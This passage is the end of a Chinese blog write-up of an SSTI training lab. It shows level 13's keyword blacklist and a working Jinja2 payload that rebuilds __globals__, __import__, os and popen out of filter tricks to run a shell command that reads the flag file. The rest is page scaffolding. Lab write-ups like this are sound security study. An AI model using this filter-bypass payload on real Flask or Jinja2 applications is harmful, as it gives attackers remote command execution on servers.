class="hljs-name">gggg</span>))(<span class="hljs-name">request</span>|attr(<span class="hljs-name">e</span>)|attr(<span class="hljs-name">f</span>)(<span class="hljs-name">ggggg</span>))&#125;&#125;</span><br></code></pre></td></tr></table></figure>
<h2 id="level-13"><a href="#level-13" class="headerlink" title="level 13"></a>level 13</h2><p>过滤：’_’, ‘.’, ‘\’, ‘’’, ‘“’, ‘request’, ‘+’, ‘class’, ‘init’, ‘arg’, ‘config’, ‘app’, ‘self’, ‘[’, ‘]’</p>
<figure class="highlight django"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs django"><span class="hljs-template-tag">&#123;%<span class="hljs-name">set</span> a=&#123;&#125;|select|string|list%&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%<span class="hljs-name">set</span> ax=&#123;&#125;|select|string|list%&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%<span class="hljs-name">set</span> aa=dict(ssss=a)|<span class="hljs-name">join</span>%&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%<span class="hljs-name">set</span> aaa=dict(ssssss=a)|<span class="hljs-name">join</span>%&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%<span class="hljs-name">set</span> aaaa=dict(ss=a)|<span class="hljs-name">join</span>%&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%<span class="hljs-name">set</span> aaaaa=dict(sssss=a)|<span class="hljs-name">join</span>%&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%<span class="hljs-name">set</span> b=dict(pop=a)|<span class="hljs-name">join</span>%&#125;</span><span class="language-xml">   # pop</span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%<span class="hljs-name">set</span> c=a|attr(b)(aa|<span class="hljs-name">length</span>*aaa|<span class="hljs-name">length</span>)%&#125;</span><span class="language-xml">  # _</span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%<span class="hljs-name">set</span> cc=a|attr(b)(aaaa|<span class="hljs-name">length</span>*aaaaa|<span class="hljs-name">length</span>)%&#125;</span><span class="language-xml"> # 空格</span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%<span class="hljs-name">set</span> d=(c,c,dict(get=a,item=a)|<span class="hljs-name">join</span>,c,c)|<span class="hljs-name">join</span>%&#125;</span><span class="language-xml">  # __getitem__</span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%<span class="hljs-name">set</span> dd=(c,c,dict(<span class="hljs-keyword">in</span>=a,it=a)|<span class="hljs-name">join</span>,c,c)|<span class="hljs-name">join</span>%&#125;</span><span class="language-xml">   # __init__</span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%<span class="hljs-name">set</span> ddd=(c,c,dict(glob=a,als=a)|<span class="hljs-name">join</span>,c,c)|<span class="hljs-name">join</span>%&#125;</span><span class="language-xml">   # __globals__</span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%<span class="hljs-name">set</span> dddd=(c,c,dict(buil=a,tins=a)|<span class="hljs-name">join</span>,c,c)|<span class="hljs-name">join</span>%&#125;</span><span class="language-xml">   # __builtins__</span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%<span class="hljs-name">set</span> e=(c,c,dict(impo=a,rt=a)|<span class="hljs-name">join</span>,c,c)|<span class="hljs-name">join</span>%&#125;</span><span class="language-xml">   # __import__</span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%<span class="hljs-name">set</span> ee=(dict(o=a,s=a)|<span class="hljs-name">join</span>)|<span class="hljs-name">join</span>%&#125;</span><span class="language-xml">   # os</span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%<span class="hljs-name">set</span> eee=(dict(po=a,pen=a)|<span class="hljs-name">join</span>)|<span class="hljs-name">join</span>%&#125;</span><span class="language-xml">  # popen</span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%<span class="hljs-name">set</span> eeee=(dict(type=a)|<span class="hljs-name">join</span>,cc,dict(flag=a)|<span class="hljs-name">join</span>)|<span class="hljs-name">join</span>%&#125;</span><span class="language-xml">  # type flag</span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%<span class="hljs-name">set</span> f=(dict(rea=a,d=a)|<span class="hljs-name">join</span>)|<span class="hljs-name">join</span>%&#125;</span><span class="language-xml">  # read</span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123;x|attr(dd)|attr(ddd)|attr(d)(dddd)|attr(d)(e)(ee)|attr(eee)(eeee)|attr(f)()&#125;&#125;</span><br></code></pre></td></tr></table></figure>
                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>2023/7/28：sstilab记录</div>
      <div>http://example.com/2023/07/28/sstilab/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>John Doe</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>July 28, 2023</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/08/03/upload-lab/" title="2023/08/03：upload-lab记录">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">2023/08/03：upload-lab记录</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/07/28/ImaginaryCTF2023/" title="2023/7/28：ImaginaryCTF2023记录">
                        <span class="hidden-mobile">2023/7/28：ImaginaryCTF2023记录</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
